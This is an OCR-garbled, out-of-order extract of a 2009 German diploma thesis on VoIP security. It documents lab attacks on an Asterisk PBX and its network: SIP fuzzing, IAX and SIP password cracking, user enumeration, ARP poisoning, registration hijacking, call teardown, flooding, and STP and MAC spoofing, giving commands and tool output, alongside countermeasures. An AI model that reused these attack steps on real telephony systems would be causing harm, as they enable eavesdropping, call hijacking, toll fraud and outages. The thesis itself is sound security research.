mehr durc
88. tee Technik und Informatik Software Schule Schweiz 8 3 2 Substandard H 235 2 Signature Security Profile 189 8 3 3 Substandard H 235 3 Hybrid Security Profile 189 8 3 4 Substandard H 235 4 Direct and Selective Routed Call Security 189 8 3 5 Substandard H 235 5 Authentifizierung in RAS bei Verwendung schwacher Shared Secrets 189 8 3 6 Substandard H 235 6 Sprachverschl sselung mit nativem H 235 H 245 Schl sselmgmt 189 8 3 7 Substandard H 235 7 Anwendung des MIKEY Schliisselmanagemeniprotokolls f r SRTP 190 8 3 8 Substandard H 235 8 Schl sselaustausch f r SRTP ber sichere Siganlisierungskan le 190 8 3 9 Substandard H 235 9 Security Gateway Support 190 8 4 Massnahmen gegen Angriffe auf RTP Sprachpakete 190 8 4 1 SRTP 190 8 4 2 Tunneln mit Ipsec 191 8 5 Massnahmen gegen Angriffe im Netzwerk 191 8 5 1 Massnahmen gegen ARP Spoofing 191 8 5 2 Massnahmen gegen MAC Spoofing 191 8 5 3 Massnahmen gegen DHCP Angriffe 191 8 5 4 Massnahmen gegen STP Angriffe 192 8 5 5 Massnahmen gegen Spoofing 192 8 5 6 Massnahmen gegen VLAN Angriffe 192 8 5 7 Massnahmen gegen IP Spoofing 192 8 5 8 Massnahmen gegen ICMP Redirect 192 8 5 9 Massnahmen gegen IRDP Spoofing 192 8 5 10 Massnahmen gegen Route Injection 193 8 5 11 Massnahmen gegen PING Flood 193 8 5 12 Massnahmen gegen SYN
89. unterbinden Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Bein SIP Fuzzing mit Protos Test Suite werden nicht weniger als 4527 verschiedene Test Cases durchgef hrt dieser ganze Ablauf wird ca 10 Min dauern sollte das Angriffsziel nicht zuvor infolge Absturz nicht mehr erreichbar sein Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 77 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 13 2 Technik und Funktionsweise Protos Test Suite ist eine Fuzzer Software die gegen Applikationen und Terminals eingesetzt werden kann Das Fuzzen ist ein Robustness Test mit welchem herausgefunden werden soll wie stabil die Implementation hier SIP des Angriffszieles l uft Dabei werden an das Angriffsziel spezielle meist nicht konforme und dazu noch fragmentierte Pakete beim Fuzzen von SIP sind diese Meldungen meist in INVITE Nachrichten verpackt gesendet Viele der Zielobjekte k nnen diese Pakete nicht verarbeiten oder interpretieren sie reagieren mit Buffer Overflows Integer Overflows Loops blockieren oder st rzen ab Da die SIP Fuzzing Nachrichten zum grossen Teil noch in INVITE Nachrichten verpackt sind haben diese noch einen zus tzlichen Angriffs Effekt Jede beim Angriffsziel eintreffende INVITE Nachricht l sst dessen Terminal klingeln Da die INVITE Nachrichten in unterschiedlichen Abst nden von langsam bis sehr
90. verf gbar X Lite befindet sich in einem instabilen Zustand obschon X Lite auf jede von Protos erhaltene INVITE Nachricht eine Response Nachricht zur cksenden konnte Die anstehenden Anrufe h ngend von den Angriffen von Protos k nnen nicht beantwortet werden es k nnen auch keine anderen Anrufe beantwortet respektive abgehend gemacht werden Die Applikation muss im Taskmanger des Betriebsystems beendet werden sie l sst sich nicht mehr auf normalem Weg schliessen 6 X Lte Incoming call from 0 amp Answer Ignore Answer Ignore Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 80 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Zu guter Letzt wird der SIP Proxy Server Asterisk selbst dem Protos Test Suite Angriff unterzogen Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet Java jar c07 sip r2 jar touri 4999 10 1 1 101 dport 5060 Was die Kommandos und Argumente im Einzelnen bedeuten wurde zuvor schon bei obigem Angriff erkl rt Es spielt dabei keine Rolle ob die eingegebene Nummer 4999 ein realer existierender User Agent ist oder nicht es geht nur darum wie der SIP Proxy Server die Pakete von Protos Test Suite verarbeiten respektive interpretieren kann KKK bt protos voip java jar c07 sip r2 jar touri 4999 10 1 1 101 dport 5060 single valued java class path using it s valu
91. virtual disk is a special type of file which will start small and then grow larger as you add applications and data to your virtual machine Create a New Virtual Disk Choose this option to add a blank disk to your virtual machine Use an Existing Virtual Disk Choose this option to reuse or share a hard disk from another virtual machine Don t Add a Hard Disk 19 02 2009 S Sch r MAS 06 02 20 Seite 22 e0 oo Berner Fachhochschule bae Technik und Informatik Software Schule Schweiz Der Netzwerk Adapter wird im Bridged Mode betrieben und ist mit next zu best tigen Pages Properties Name and Location Guest Operating System Memory and Processors Hard Disk Network Adapter CD DVD Drive Properties Floppy Drive Properties USB Controller Ready to Complete Pages Which network will your virtual machine access Network Connection Bridged _ Connect at Power On Yes Es wird angegeben dass sich das guest operating system also BackTrack3 in einem ISO File befindet und mit next best tigt CD DVD Drive Name and Location Guest Operating System Memory and Processors Hard Disk Network Adapter Properties CD DVD Drive Properties Floppy Drive Properties USE Controller Ready to Complete CD and DVD media can be accessed on the host system or on your local computer Host Media Use a Physical Drive Choose this option to give the quest op
92. welche Benutzernamen und giiltigen Accounts auf dem Asterisk Proxy Server existieren 3 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer will wissen welche g ltigen User Accounts im Asterisk Proxy Server vorhanden sind um mit diesen Informationen sp ter weitere Angriffe ausf hren zu k nnen Dazu muss er Registrierungsanfragen mit m glichen vorhandenen User Accounts an den Asterisk Proxy Server senden welche er in einer Liste zuvor abgespeichert hat Damit der Angreifer die Registrierungsanfragen an den Asterisk Proxy Server senden kann braucht er nur dessen IP Adresse zu wissen Zu dieser Information kommt er indem er ein Port Scanner wie Zenmap siehe Kapitel 2 2 1 einsetzt oder den Netzwerkverkehr abh rt F r den Angriff selbst ist der Zugang zum Netzwerk erforderlich sei es lokal oder per remote aus der Ferne Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet enumiax v d dict 10 1 1 101 Die Werte im Einzelnen stehen wie folgt f r enumiax Aufruf Tool V Voransicht Tool erzeugt mehr Logs d dict Alle im File dict enthaltenen Benutzernamen werden durchgetestet ethO Besagt tiber welche Schnittstelle des PC s die Daten gesendet werden sollen 10 1 1 101 IP Adresse des Asterisk Proxy Servers Der Angreifer kann im Wissen dass fiir die Benutzernamen der User Agents in den meisten Fallen die interne Rufnummer oder der Name verwendet wir
93. wird der zweite Eintrag gew hlt Nach erfolgreichem Cracken des MD5 Hashwertes wird dass Passwort mittels dem Hinweis Found Password PASSWORT angezeigt und ebenfalls bei den aufgelisteten Eintr gen aktualisiert Interessant ist in welcher Zeit das Tool dieses Passwort gekrackt hat An 162213 Stelle in der W rterliste wurde das Passwort entdeckt Das Tool ben tigte nicht mal eine Sekunde um so viele W rter gegen den MD5 Hashwert durchzurechen stefansstefan desktop sudo sipcrack w wordlist final txt logins dump SIPcrack 8 2 MaJoMu www codito de Found Accounts Num Server Client user Hash Password 1 18 1 1 151 10 1 1 101 4119 13579 2 i8 1 1 151 10 1 1 101 4119 c5cdc1b9e2b3a17c653ff8a38fc228e2 3 18 1 1 151 18 1 1 101 4119 ce7e879a33bc5ef630595735920590 E79 Select which entry to crack 1 3 222 Select which entry to crack 1 3 2 Generating static MDS hash 53231537d58030c6d7b45909936517f27 Loaded wordlist wordlist final txt Starting bruteforce against user 4119 MD5 c5cdc1b9e2b3317c653ff8338fc220e2 Tried 162213 passwords in seconds Found password 13579 Updating dump file logins dump done stefan stefan desktop sudo sipcrack w wordlist final txt logins dump SIPcrack 8 2 MaJoMu www codito de Found Accounts Num Server Client User Hash Password 1 18 1 1 151 10 1 1 101 4119 13579 2 18 1 1 151 10 1 1 161 4119 13579 3 10 1 1 151 10 1 1 101 411
94. 0 There was a connection timeout while scanning 4003 5 gt gt Found a live extension user at 4129 10 1 1 101 with SIP response code s INVITE 180 There was a connection timeout while scanning 4261 There was a connection timeout while scanning 4111 Scan Pause Stop I Verbose Done Scanning Save Results under File gt fam In der Aufzeichnung von Wireshark ist zu sehen wie die Liste der users txt abgearbeitet wird INVITE Nachrichten zu denen es keinen g ltigen registrierten Benutzer gibt werden mit Response Code 404 Not Found beantwortet Mi Alepnonesrutengcap Wiresho E O te nna ie File Edit View Go Capture Analyze Statistics Help Filter sip v Expression Clear Apply Destination Protocol Info Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 38 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Die Menge der gleichzeitig klingelnden Terminals und das Verhalten dass nach dem Beantworten dieser Rufe auf der anderen Seite kein Gespr chspartner vorhanden ist hat die PBX Asterisk in einen instabilen Zustand und sp ter zum totalen Absturz gebracht Die Wireshark Aufzeichnung zeigt dass Asterisk mit der IP Adresse 10 1 1 101 nicht mehr erreichbar ist Im Taskmanager ist zu sehen dass Asterisk zu 99 die CPU belastet blockiert ist und nur noch das Operating System belastet Windows Task Manager Datei Opti
95. 0 3 4 2 Technik und Funktionsweise 91 3 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 91 3 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 92 3 5 1 IAX Authentication downgrade Attack 93 3 5 2 Technik und Funktionsweise 94 3 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 94 3 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 96 3 6 1 Denial of Service IAX Registration Reject 97 3 6 2 Technik und Funktionsweise 98 3 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 98 3 6 4 __ Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 99 3 7 1 Denial of Service IAX Hangup 100 3 7 2 Technik und Funktionsweise 101 3 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 101 3 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 102 4 H 323 Einf hrung 103 4 1 1 Die wichtigsten in H 323 enthaltenen Standards 103 4 1 2 Exemplarischer Verbindungsaufbau mit H 225 104 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 7 oo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 4 2 1 Enumeration H 323 User amp Server 105 4 2 2 Technik und Funktionsweise 106 4 2 3 Ausgan
96. 0 Seite 102 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 4 H 323 Einf hrung Das H 323 Protokoll ist ein Rahmenwerk das dazu verwendet werden kann um VOIP Verbindungen auf und abzubauen H 323 ist ein Standard der von der ITU T entwickelt wurde In H 323 gibt es Endpoints Terminals und die Gatekeeper welche die Endpoints kontrollieren Der Gatekeeper ist verantwortlich f r die Bandbreite er verwaltet diese und stellt den Endpoints nur soviel zur Verf gung wie sie auch wirklich brauchen Der Gatekeeper stellt auch die Zuordnung der Telefonnummern der Endpoints zu deren IP Adressen sicher Damit ein Endpoint eine Verbindung aufbauen kann muss er sich beim Gatekeeper registrieren Somit muss er dem Gatekeeper mit Benutzernamen und Passwort bekannt sein welche beim Registrierungsvorgang kontrolliert werden 4 1 1 Die wichtigsten in H 323 enthaltenen Standards H 245 und H 225 Beide Standards werden dazu verwendet um VOIP Sitzungen zu initialisieren Die Nutzdaten werden nach dem Verbindungsaufbau ber das RTP Protokoll ausgetauscht H 225 baut zwischen den einzelnen Kommunikationspartnern einen Steuerkanal auf respektive auch wieder ab ber diesen Steuerkanal werden die RTP Sitzungen initiiert H 245 ist ein Steuerungsprotokoll ber welches die Endpoints Informationen der zu verwendenden Codecs austauschen dies kann auch inmitten einer schon bestehenden RTP Sitzung sein H 235
97. 0 l st damit _ http de wikipedia org wiki Real den RFC 1889 ab Time_Transport_Protocol S MIME Secure Multipurpose Internet Mail Extensions ist ein Standard f r die Verschl sselung und Signatur von MIME gekapselter E Mail durch ein asymmetrisches Kryptosystem http de wikipedia org wiki S MIME Das Skinny Client Control Protocol SCCP ist der proprietare Cisco Standard fiir Telefonate und Konferenzen auf Basis des Internet Protokolls in Echtzeit SCCP kann auch in Umgebungen mit H 323 MGCP und SIP eingesetzt http de wikipedia org wiki Skinny_ werden Client_Control_ Protocol Das Stream Control Transmission Protocol SCTP ist ein zuverlassiges verbindungsorientiertes Transportprotokoll das auf einem potenziell unzuverlassigen verbindungslosen Paketdienst aufsetzt beispielsweise auf IP http de wikipedia org wiki SCTP Mit dem Session Description Protocol SDP RFC 4566 werden Eigenschaften von Multimediadatenstr6men beschrieben Es dient dazu Kommunikationssitzungen zu verwalten und wird beispielsweise zusammen mit SIP und H 323 in der IP Telefonie bei der Aushandlung von Codecs Transportprotokollen und adressen und Zur Ubertragung http de wikipedia org wiki Session von Metadaten eingesetzt Description Protocol Das Session Initiation Protocol SIP ist ein Netzprotokoll zum Aufbau zur Steuerung und zum Abbau einer Kommunikationssitzung zwischen zwei und mehr Teilnehmern Das Protokoll wird im RFC 3261 spe
98. 02 2009 07 02 2009 08 02 2009 09 02 2009 10 02 2009 11 02 2009 12 02 2009 13 02 2009 14 02 2009 15 02 2009 16 02 2009 17 02 2009 18 02 2009 19 02 2009 eo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Angriffe gegen die Netzwerkinfrastruktur Angriffe gegen die Netzwerkinfrastruktur Sitzung mit Betreuer Einarbeiten STP der Switche STP Angriffe Nachtests Angriffe gegen die Netzwerkinfrastruktur Angriffe gegen die PBX Ascotel Nachtests Netzwerkinfrastruktur Nachtests SIP Angriffe gegen die PBX Ascotel Angriffe gegen die PBX Ascotel Kontrolle Pflichtenheft vorgaben Angriffe gegen die PBX Ascotel Sitzung mit Betreuer Nachtests H 323 Erstellung Diplombericht Nachtests Netzwerkinfrastruktur Erstellung Diplombericht Erstellung Diplombericht Erstellung Diplombericht Erstellung Diplombericht Erstellung Pr sentation f r Vortrag Erstellung Diplombericht Diverse Nachtests Ascotel amp SIP Erstellung Diplombericht Korrektur Diplombericht Erstellung Diplombericht Fertigstellung Diplombericht Pr sentationsvorbereitung Besichtigung Pr sentationsraum CD erstellen Doku Total geleistete Arbeitsstunden 10 10 10 12 11 14 12 12 13 17 16 12 511 5 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 226 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 Statusberichte 14 4 1 Statusbericht Nr 1 Projekt
99. 1 1 191 10 1 1 190 TELNET Telnet Data 45 18 935972 10 1 1 190 10 1 1 191 TELNET Telnet Data 46 19 104745 10 1 1 191 10 1 1 190 TCP telnet gt 13167 ACK Seq 4 Ack 4 win 40 48 19 264089 cCompal n_0b ad 96 Broadcast ARP who has 10 1 1 1 Tell 10 1 1 199 6 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Zugriff auf die Managementkonsole hat der Angreifer nun die M glichkeit eine ganze Reihe von weiteren Angriffen zu starten die wichtigsten sind untenstehend aufgelistet DOS Portsecurity einschalten die angeschlossen Hosts haben keinen Zugriff mehr VLAN Ausschalten des VLAN um Zugriff auf bestimmte Netze zu erlangen STP Spanning Tree ausschalten und so indirekt Netzwerktiberlast erzeugen Security Portsecurity ausschalten um eigene Ger te anzuschliessen Mirroring Ports auf ein anderes Port spiegeln lassen um so an fremde Datenpakete zu kommen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 160 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Das Tool ist in BackTrack3 enthalten Hinweise zu Installation Verf gbarkeit Das Tool ist in BackTrack3 enthalten Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Benennung Angriffe Analyse Angriff Analyse gegen 6 8 1 IRDP Spoofing Integrit t he RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit irdp
100. 121 00085019408F 10 1 1 151 001CC007F350 Lost packets 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 16 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz Es muss das Angriffsziel gew hlt werden von dem der Datenstrom gesnifft werden soll In diesem Beispiel wird die IP Adresse 10 1 1 151 gew hlt Wie sp ter in diesem Diplom Bericht ersichtlich ist handelt es sich hierbei um ein Softphone mit der Rufnummer 4119 Damit nicht nur die Daten gesnifft werden k nnen welche das Angriffsziel sendet sondern auch diejenigen die es von seinem Kommunikationspartner erh lt muss auf der rechten Seite des Fensters sein Kommunikationspartner auch gew hlt werden Da es sich bei dem Angriffsziel 10 1 1 151 um ein VOIP Terminal handelt welches immer ber den VOIP Proxy Server kommuniziert wird in diesem Beispiel der VOIP Proxy Server 10 1 1 101 gew hlt Es k nnen nat rlich auch alle Hosts Server der rechten Seite ausgew hlt werden dies empfiehlt sich wenn nicht genau bekannt ist mit wem das Angriffsziel kommuniziert Die Auswahl ist mittels OK zu best tigen EA Fil eu Son alp Oe we o 2 mmaa A EA Decoders 2 Network I Sniffer Ea Cracker 2 Traceroute es CCDU x Wireless Query l i APR i E APR Cert 2 APR DNS New ARP Poison Routing BEE APR SSH 1 0 u 8 APR HTTPS 0 WARNING H JA APR RDP 0 APR enables you to hijack IP traffic be
101. 12405 67 bytes on wire 67 bytes captured Ethernet II Src Vmware_55 dd b4 00 0c 29 55 dd b4 Dst Intelcor_07 f3 50 00 1c c0 07 f3 50 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 151 10 1 1 151 User Datagram Protocol Src Port iax 4569 Dst Port iax 4569 Inter Asterisk exchange v2 amp Packet type Full packet 1 000 0000 0000 0011 Source call 3 000 0000 1011 1000 Destination call 184 Timestamp 62023 Outbound seq no 20 Inbound seq no 23 amp Type IAX 6 IAX subclass HANGUP 5 amp Information Element Cause Dumped Call IE id Cause 0x16 Length 11 Cause Dumped Call N Retransmission False 3 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Der Angreifer kann bestehende Verbindungen trennen Die Gegenseite des getrennten Gespr chspartners bekommt vom ganzen Vorgang nichts mit und bemerkt erst durch das Ausbleiben der Sprachpakete des angeriffenen IAX Clients dass etwas nicht stimmt Snifft der Angreifer nach vorhandenen Gespr chen an einem neuralgischen Punkt wie zum Beispiel direkt vor dem Asterisk Proxy Server so kann er s mtliche Gespr che dieser Dom ne trennen was einem DoS Denial of Service gleich kommt F r einen Gesch fts Betrieb welcher seine Auftr ge via Telefon bekommt kann dies imagesch digend sein und verheerende finanzielle Folgen haben Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 2
102. 129 IP Adresse 10 1 1 129 sendet worauf dieser den Verbindungsabbau best tigt RO ee x Uh resort dump 61200 YE pap Wireshark un EEE lL Eile Edit View Go Capture Analyze Statistics Help Fite Er Expression Clear Apply m 2 11 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Hat ein Angreifer die M glichkeit den Netzwerkverkehr aufzuzeichnen so ist er auch in der Lage gespoofte BYE Nachrichten zu versenden Er hat somit die Kontrolle welche Verbindungen er wann kappen will Kann der Angreifer den Netzwerkverkehr an einem neuralgischen Punkt wie bei einem Gateway oder vor dem SIP Proxy Server VOIP PBX berwachen ist er Herr ber alle Gespr chsverbindungen in diesem Betrieb Durch seine Angriffe kann er den Telefoniebetrieb vollst ndig berwachen respektive zum Erliegen bringen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 71 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 12 1 Denial of Service INVITE Flood Integrit t RESTE RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit x inviteflood Downloadlink Quelle des Tools Schweregrad http www hackingvoip com sec_tools html 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbar
103. 19 93 a7 oo ee 79 14 ee I Ne E Dynamic I No Dynamic No 00 1c c0 07 43 50 Der Angreifer mit der IP Adresse 10 1 1 241 der gespooft die MAC Adresse des Asterisk Proxy Servers sendet zBsp Paket Nr 82 gespoofte MAC Adresse unten rot markiert Ab Paket Nr 85 hat der Switch seine MAC Tabelle aktualisiert und alle fiir das Angriffsziel bestimmten Pakete werden an den Angreifer gesendet Zu sehen sind die Sprachpakete eines w hrend dem Angriff laufenden Gespr ches zwischen User Agent 4111 und 4129 Die Sprachpakete werden nicht mehr zum Asterisk Proxy Server geleitet sondern direkt zum Angreifer Da dieser keine Vermittlungsaufgaben bernimmt werden diese Pakete nicht an den anderen Gespr chspartner geleitet keine Source Pakete von 10 1 1 1 10 1 1 241 sichtbar und gehen verloren File Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply Source Destination Protocol Info BROWSER Frame 82 252 bytes on wire 252 bytes captured Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst Broadcast ff ff ff ff ff ff Internet Protocol src 10 1 1 241 10 1 1 241 DSt 10 1 255 255 10 1 255 255 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 141 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 2 4 MAC Spoofing gegen Port Security Eine weitere Variante von MAC Spoofing ist untenste
104. 2 55 00s elapsed 41 services on 1 host Initiating 05 detection try 1 against 10 1 1 129 SCRIPT ENGINE Initiating script scanning Host 10 1 1 129 appears to be up good All 1000 scanned ports on 10 1 1 129 are closed 959 or openlfiltered 41 MAC Address 00 08 5D 19 93 A7 Aastra Warning OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type WAP printer switch VoIP phone Running Apple embedded Canon embedded HP embedded UTStarcom embedded Toshiba embedded OS details Apple AirPort Extreme v5 7 or AirPort Express v6 3 or Canon imageRUNNER multifunction printe 3500 yl switch Toshiba e STUDIO 351c 3510c or 520 multifunction printer Network Distance 1 hop Read data files from C Program Files Nmap OS and Service detection performed Please report any incorrect results at http nmap crg submit Nmap done 1 IP address 1 host up scanned in 62 01 seconds Raw packets sent 1401 39 908KB Revd 966 54 304KB SE 2 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Die Enumeration ist eigentlich die Planungsphase weiterer Angriffe W hrend der Enumeration werden dem Angreifer potentielle Ziele aufgelistet und eventuelle Konfigurationsfehler des Netzwerkes aufgezeigt welche m gliche Einstiegspunkte in das Unternehmensnetzwerk beinhalten Anhand der gefundnen Hosts Server und den dazugeh renden Operating Systems kann beim D
105. 2 2009 S Sch r MAS 06 02 20 Seite 78 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Received Returncode 486 Received Returncode 486 Received Returncode 486 Sending CANCEL test case 1673 226 bytes Sending Test Case 1674 test case 1674 33473 bytes Received Returncode 486 Sending CANCEL test case 1674 33240 bytes Sending ACK test case 1674 33234 bytes Sending valid case test case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes est case 1674 453 bytes test case 1674 453 bytes est case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes est case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes test case 1674 453 bytes RK Als n chstes soll der User Agent 4119 Softphone X Lite mit dem Fuzzer Tool Protos Test Suite angegriffen werden Da es sich um ein Softphone handelt und somit um eine Applikation kann nicht davon ausgegangen werden dass dieses Terminal auf dem Port 5060 das Netzwerk nach SIP Nachrichten abhorcht Um dennoch einen Angriff gegen dieses Softphone starten zu k nnen muss zuerst dessen aktuelles offenes Port welches das Netzwerk nach SIP Nachrichten abh rt herausgefunden werden Dazu wird mit einem Netzwerkmonitor hier Wireshark eine INVITE Nachricht dieses User Agents 4119 mitgesnifft Darin teilt er dem
106. 29 bezeichnet einen von der ITU T beschriebenen Codec zur Komprimierung von Sprache in digitale Signale Die technische Bezeichnung lautet auch Conjugate Structure Algebraic Code Excited Linear Prediction CS ACELP G 729 wird beispielsweise bei IP Telephonie Verbindungen Internet Telefonie eingesetzt Ein Gatekeeper ist ein Ger t das wesentliche Gateway Funktionalit ten zwischen IP Netz und Telefonnetz in einer IP Telephonie Installation bernimmt Es setzt die im H 323 Rahmenstandard definierten Schnittstellenfunktionen um und dient haupts chlich der Emulation des PSTN Verbindungsaufbaus ber das IP Netz und der Anpassung der Datenstr me Dazu bernimmt er die Signalisierung die notwendige bersetzung von Telefonnummern in IP Adressen und umgekehrt sowie sp ter die Paketierung des synchronen Datenstroms aus dem Telefonnetz in IP Pakete nach dem H 225 Standard Des Weiteren ist er f r die Verwaltung einer Zone verantwortlich welche Terminals Gateways und Multipoint Control Units beinhaltet H 225 0 beschreibt die Rufsignalisierung innerhalb H 323 die Medien Audio und Video die Umwandlung des Datenstroms in Pakete die Synchronisierung des Datenstroms und die Kontrolle des Nachrichtenformats H 323 ist ein Protokoll der H 32X Serie die auch die Kommunikation ber ffentliche Telefonnetze und ISDN enth lt Es ist eine bergeordnete Empfehlung der ITU T in der Protokolle definiert werden die eine audio vis
107. 46491225 Please type in the captured MDS hash value C MDS challenge result in your sniffed IAK session f d1i8b267f 8ehb3275db6e6 76692b3F Bac Brute forcing passwords Testing password 35 hematemesis The password is 3ascotel which matches the hash of di8b267 8eb3275d6e6 766G2b3 fF 8ac 4 F Programme NiSEC Partners IAX Brute gt 3 4 4 Folgende Auswirkungen und Gefahren fiir das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen der Registrierungsdaten und dem Cracken des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten ins Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gemacht Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Er kann sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Auch ist ein Telefonieren auf Kosten anderer m glich Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 92 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 5 1 TAX Authentication downgrade Attack Integrit t nennen Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x vnak Downloadlink Quelle
108. 47546 Content Type application sdp Expires 3600 Content Length 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 55 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Beweis des erfolgreichen Angriffes Untenstehender Wiresharktrace zeigt wie mit der Paket Nr 84 ein ankommender Anruf f r User Agent 4119 von User Agent 4111 10 1 1 121 an den SIP Proxy Server gesendet wird Infolge der gehijackten Registration sendet der SIP Proxy Server in Paket Nr 88 die INVITE Nachricht zu User Agent 4115 mit der IP Adresse 10 1 1 241 W re an dieser Adresse zuvor ein Hard oder Softphone mit dem Netzwerk verbunden worden w re der Anruf von 4111 zu 4115 zustande gekommen In der Testumgebung war jedoch zur Zeit dieses Angriffes das Softphone nicht gestartet und deshalb wurde die Meldung 404 Unknown user account zur ck an den SIP Proxy Server gesendet was dann schlussendlich zum Verbindungsabbruch f hrte RegHijacking i ter Aufbau zu gefakter dest 241 wo account ni gibt pcap Wiresh File Edit View Go Capture Analyze Statistics Help Fitter sip OOOO Anstelle einer existierenden IP Adresse kann auch eine ung ltige IP Adresse in den Contact Informationen eingetragen werden Es werden dadurch s mtliche ankommenden Anrufe f r das Angriffsziel verloren gehen respektive beim Verbindungsaufbau des Anrufers wieder abgebaut F r untenstehenden Wiresharktrac
109. 5 21 bytes on wire 21 bytes captured IEEE 802 3 Ethernet Logical Link Control Spanning Tree Protocol Protocol Identifier Spanning Tree Protocol 0x0000 Protocol version Identifier Spanning Tree 0 BPDU Type Topology Change Notification 0x80 N Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 150 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz W hrend dem Angriff wurde versucht den Switch selbst zu pingen Da dieser andauernd eine Neuberechnung des Spanning Tree vornahm und dadurch in dieser Zeit weder Pakete empfangen noch weiterleiten konnte war dieser nicht erreichbar Der Angriff zeigt dass somit w hrend des Floodings die Pfade zu den anderen Switches inaktiv sind und somit die Hosts respektive Server im Netzwerk nicht mehr erreichbar sind gt Auch genannt DoS Angriff Denial of Service EI Administrator C Windows system32 cmd exe x Microsoft Windows Version 6 8 6861 opyright lt c gt 2866 Microsoft Corporation Alle Rechte vorbehalten G Users stefan gt ping 18 1 1 191 wird ausgef hrt f r 16 1 1 191 mit 32 Bytes Daten t von 16 1 1 241 Zielhost nicht erreichbar t von Zielhost nicht erreichbar von z Zielhost nicht erreichbar Antwort von 18 1 1 241 Zielhost nicht erreichbar ing Statistik f r 18 1 1 191 Pakete Gesendet 4 Empfangen 4 Verloren z VUerlust gt C Users stefan gt 6 4 5 Folgende Auswi
